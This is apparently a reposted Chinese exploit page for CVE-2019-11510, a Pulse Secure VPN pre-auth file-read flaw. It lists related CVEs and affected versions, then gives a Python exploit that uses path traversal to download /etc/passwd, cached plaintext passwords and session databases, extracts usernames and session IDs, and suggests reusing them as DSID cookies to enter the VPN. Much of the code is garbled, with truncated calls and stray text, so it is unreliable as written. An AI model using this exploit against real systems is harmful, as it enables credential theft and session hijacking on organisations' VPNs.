PulseSecure任意⽂件读取(CVE-2019-11510)漏洞
漏洞分析
我们可以通过CVE-2019-11510这个未授权的任意⽂件读取漏洞把以下⽂件下载回来。
1. /etc/passwd
2. /etc/hosts
3. /data/runtime/mtmp/system
4. /data/runtime/mtmp/lmdb/dataa/data.mdb
5. /data/runtime/mtmp/lmdb/dataa/lock.mdb
6. /data/runtime/mtmp/lmdb/randomVal/data.mdb
7. /data/runtime/mtmp/lmdb/randomVal/lock.mdb
其中,mtmp/system⽂件保存了⽤户名和密码哈希。
dataa/data.mdb缓存了已登录⽤户的明⽂密码。
randomVal/data.mdb⽂件保存了⽤户的会话。
但是就是获得了账号密码,也要⾯对双因素认证。
第⼀⽅法,通过randomVal/data.mdb保存的会话登录。
事实上,研究员还发现了以下安全漏洞。
CVE-2019-11510 - Pre-auth Arbitrary File Reading
CVE-2019-11542 - Post-auth Stack Buffer Overflow
CVE-2019-11539 - Post-auth Command Injection
CVE-2019-11538 - Post-auth Arbitrary File Reading
CVE-2019-11508 - Post-auth Arbitrary File Writing
CVE-2019-11540 - Post-auth Session Hijacking
影响版本
漏洞编号            影响版本
CVE-2019-11510                Pulse Connect Secure: 9.0RX 8.3RX 8.2RX
CVE-2019-11542                Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX 和 Pulse Policy Secure:9.0RX 5.4RX 5.3RX 5.2RX 5.1RX
CVE-2019-11539                Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX 和 Pulse Policy Secure: 9.0RX 5.4RX 5.3RX 5.2RX 5.1RX
CVE-2019-11538                Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX
CVE-2019-11508                Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX
CVE-2019-11540                Pulse Connect Secure: 9.0RX 8.3RX 和 Pulse Policy Secure: 9.0RX 5.4RX
漏洞利⽤
参考以上shell脚本写的python版exp:
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import os
import sys
from urllib.parse import urlparse,urljoin
banner = '''
_______      ________    ___  ___  __  ___        __ __ _____ __  ___
/ ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ /_ | ____/_ |/ _ \
| |    \ \  / /| |__ ______ ) | | | || | (_) |______| || | |__  | | | | |
| |      \ \/ / |  __|______/ /| | | || |\__, |______| || |___ \ | | | | |
| |____  \  /  | |____    / /_| |_| || |  / /      | || |___) || | |_| |
\_____|  \/  |______|  |____|\___/ |_| /_/        |_||_|____/ |_|\___/
python By StudyCat
'''
print (banner)
def exp(url):
netloc = urlparse(url)[1]
path = urlparse(url)[2]
if path == '/':
url = url
elif path == '':
url = url+'/'
else:
print("URL Error")
return
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/', verify=False)
if r.status_code == 200 and 'root:x:0:0:root' :
print(url + " ---------------> Vulnerable\n")
print('Extracting /etc/passwd')
print ("Writing all files to output dir "  + netloc)
if not ists(netloc):
os.mkdir(netloc)
+"\n")
f = open(netloc+'/passwd','a')
f.)
f.close()
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/', verify=False)
if r.status_code == 200:
print('Extracting /etc/hosts')
)
f = open(netloc+'/hosts','a')
f.+"\n")
f.close()
print('Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password')
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/', verify=False)  if r.status_code == 200:
f = open(netloc+"/data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
f = open(netloc+"/data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
f.t)
cve漏洞库f.close()
f = open('data_runtime_mtmp_lmdb_dataa_data.mdb','rb')
users = []
buf = f.readline()
while buf:
n = unt(b'CN=')
if n>0:
for i in range(n):
if i :
indexx = buf.find(b'CN=',indexx+1)
else:
indexx = buf.find(b'CN=')
t = buf[indexx:indexx+100]
end = t.find(b'\x00')
t = buf[indexx:indexx+end]
users.append(t.decode())
buf = f.readline()
f.close()
users = list(set(users))
f = open(netloc+"/","a")
for line in users:
f.write(line+"\n")
f.close()
print("Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn")
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/', verify=False  if r.status_code == 200:
f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_data.mdb",'ab')
f.t)
f.close()
f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_data.mdb",'rb')
sessionids = []
buf = f.readline()
while buf:
n = unt(b'randomVal')
if n>0:
for i in range(n):
if i :
indexx = buf.find(b'randomVal',indexx+9)
else:
indexx = buf.find(b'randomVal')
t = buf[indexx:indexx+41]
if len(t)==41 and b'\x00' not in t:
sid = t[9:].decode()
sessionids.append(sid)
buf = f.readline()
f.close()
sessionids = list(set(sessionids))
f = open(netloc+'/','a')
for sid in sessionids:
print(sid)
f.write(sid+"\n")
f.close()
else:
print(url + " ---------------> Not Vulnerable")
def main():
url = sys.argv[1]
exp(url)
if __name__ == '__main__':
main()
main()
参考:
转载请注明出处。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。